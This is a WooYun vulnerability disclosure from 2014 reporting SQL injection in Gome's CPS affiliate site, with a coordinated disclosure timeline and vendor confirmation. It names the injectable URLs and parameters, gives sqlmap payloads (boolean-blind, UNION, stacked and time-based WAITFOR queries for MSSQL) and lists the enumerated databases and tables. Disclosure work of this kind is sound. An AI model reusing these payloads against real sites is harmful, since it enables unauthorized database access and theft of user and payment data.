当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051102

漏洞标题:国美在线某站点SQL注入合集

相关厂商:国美控股集团

漏洞作者: HackBraid

提交时间:2014-02-16 14:53

修复时间:2014-04-02 14:53

公开时间:2014-04-02 14:53

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-16: 细节已通知厂商并且等待厂商处理中
2014-02-24: 厂商已经确认,细节仅向厂商公开
2014-03-06: 细节向核心白帽子及相关领域专家公开
2014-03-16: 细节向普通白帽子公开
2014-03-26: 细节向实习白帽子公开
2014-04-02: 细节向公众公开

简要描述:

SQL注入

详细说明:

站点:
http://cps.gome.com.cn/
注入点:
1.http://cps.gome.com.cn/Home/NoticeDetail?id=132
2.http://cps.gome.com.cn/Earner/GetCode/AdsUserSelfEdit?id=901&webname=%E5%AE%B6%E7%BE%8E id=901
站点的注入点修复不完全,只是跳转,关键的传递参数未做处理。

漏洞证明:

以第一个注入点为例:
数据库:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=132' AND 1148=1148 AND 'bVwH'='bVwH
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=-1683' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(120)+CHAR(114)+CHAR(113)+CHAR(89)+CHAR(108)+CHAR(100)+CHAR(118)+CHAR(115)+CHAR(102)+CHAR(118)+CHAR(83)+CHAR(102)+CHAR(115)+CHAR(113)+CHAR(101)+CHAR(102)+CHAR(117)+CHAR(113),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=132'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=132' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] GomeCps
[*] master
[*] model
[*] msdb
[*] tempdb


GomeCps数据库的table:

Database: GomeCps
[46 tables]
+-------------------------+
| Accounts |
| AdsCode |
| AdsCode |
| AdsUserSelf |
| BackupCookies |
| BannerAds |
| BaseCPSOriDataEffects |
| CPSNoEffectBanlce |
| CPSOriDataEffect_Backup |
| CPSOriDataEffect_Backup |
| CPSOriDataOccur_Backup |
| CPSOriDataOccur_Backup |
| CommissionByPcd |
| Commissions |
| CookiesRecent |
| Cookies_D |
| Cookies_D |
| CurrentSettlements |
| EarnerInfos |
| HelpSetUp |
| IpReport |
| IpReportRecent |
| MemberType |
| Notices |
| PageGroup |
| Payments |
| Products |
| RecommendedAd |
| RoleAuthority |
| Roles |
| SettlementHistorys |
| SettlementLogs |
| ShowComTop |
| SiteType |
| StageCommissionLogs |
| StageCommissionLogs |
| Taxs |
| TemporaryBackupCookies |
| Users |
| WebSites |
| categorysHistory |
| categorysHistory |
| modules |
| plan |
| sqlmapfile |
| sysdiagrams |
+-------------------------+

修复方案:

对传递的参数进行处理

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-02-24 15:18

厂商回复:

已对漏洞进行修复,谢谢支持

最新状态:

暂无